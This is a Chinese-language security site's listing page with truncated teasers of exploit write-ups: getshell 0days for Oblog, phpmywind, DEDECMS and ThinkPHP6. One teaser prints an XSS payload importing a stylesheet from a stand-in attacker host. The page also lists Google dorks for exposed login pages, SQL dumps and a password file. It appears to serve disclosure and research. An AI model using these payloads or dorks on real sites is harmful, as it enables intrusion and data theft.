搜索 “tsh”

不再关注网络安全

Oblog 4.5-4.6 access&mssql getshell 0day
  • 2012-06-30
  • Vulndb
  • 2112 阅读

Oblog 4.5-4.6 access&mssql getshell 0day 引导语: 影响范围:4.5 - 4.6 漏洞需求: IIS6.0\开启会员 挖掘作者:henry 绝对原创,技术含量不高,但影响范围比较广.. 漏洞文件: AjaxServer.asp (372行) ASP log_filename = Trim(Requ...

phpmywind xss & csrf getShell 拿下官网

phpmywind xss & csrf getShell 拿下官网

审计代码吧,首先看后台能不能getShell 直接编辑 php文件 写入一句话 所有Sql 语句全部经过一个非常变态的函数 80sec 写的,绕不鸟,群里面叫了几句,无果, 压力肯大 Sql injection不可能了,看到 message.php PHP if(@$action == 'add') { $sql = "INSERT INTO `#@__message` (nickname, contact, content, o...

DEDECMS XSS GETSHeLL 通杀所有版本
  • 2012-02-14
  • 周边
  • 2166 阅读

利用条件:开启注册&&开启投稿 方法 :注册会员 -> 发表文章:内容输入 <style>@import´http://xxx.com/xss.css´;</style> 1 <style>@import´http://xxx.com/xss.css...

( intitle:"PacketShaper Login")|(intitle:"PacketShaper Customer Login")
  • 2005-05-20
    • shdb
  • 1302 阅读

Packeteer's PacketShaper is an application traffic management system that monitors, controls, and accelerates application performance over the WAN Internet.

intitle:"PacketShaper Customer Login"
  • 2005-05-19
    • shdb
  • 1251 阅读

PacketShaper Login.Provides login access for PacketShaper Customers.

intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board"
  • 2004-12-19
    • shdb
  • 1966 阅读

The bitboard2 is a board that need no database to work. So it is useful for webmaster that have no access to a sql database. The password file can be retrieve from/admin/data_passwd.dat

inurl:/wp-content/uploads/ “phpMyAdmin SQL Dump”
  • 2021-06-11
    • shdb
  • 1409 阅读

# Google Dork: inurl:/wp-content/uploads/ "phpMyAdmin SQL Dump" # Files Containing Juicy Info # Exploit Author: Robotshell

iOS移动命令渗透测试备忘录

iOS移动命令渗透测试备忘录
  • 2020-05-19
  • 周边
  • 6027 阅读

注意:iOS应用程序与Android应用程序具有不同的环境,此处的某些命令仅适用于MacOS。 iOS渗透测试指南 Install Brew, 打开 terminal (Finder -> Application -> Utilities -> Terminal) 键入命令 :$ /usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)" Install XCode, 打开 ter...

thinkphp6 session 任意文件创建漏洞POC

thinkphp6 session 任意文件创建漏洞POC
  • 2020-02-01
  • Vulndb
  • 7838 阅读

2020年1月13号,Thinkphp 6.0.2发布,在详情页指出修复了一处Session安全隐患。经分析,该漏洞允许攻击者在目标环境启用session的条件下创建任意文件以及删除任意文件,在特定情况下还可以getshell。 具体受影响版本为ThinkPHP6.0.0-6.0.1。 漏洞复现 在index控制器中添加如下action public funct...

便携专业的DFIR/OSINT瑞士军刀:POCKINT

便携专业的DFIR/OSINT瑞士军刀:POCKINT

POCKINT OSINT工具 POCKINT(又名Pocket Intelligence)是DFIR/OSINT专业人员的OSINT瑞士军刀,用于信息收集。它设计为轻巧且可移植的GUI程序(将在USB或调查VM中承载),以紧凑的形式为用户提供基本的OSINT功能:POCKINT的输入框接受典型的指示符(URL,IP,MD5)并为用户提供具有以迭代方式执行基本OSINT数据挖掘任务的能力。 POCKI...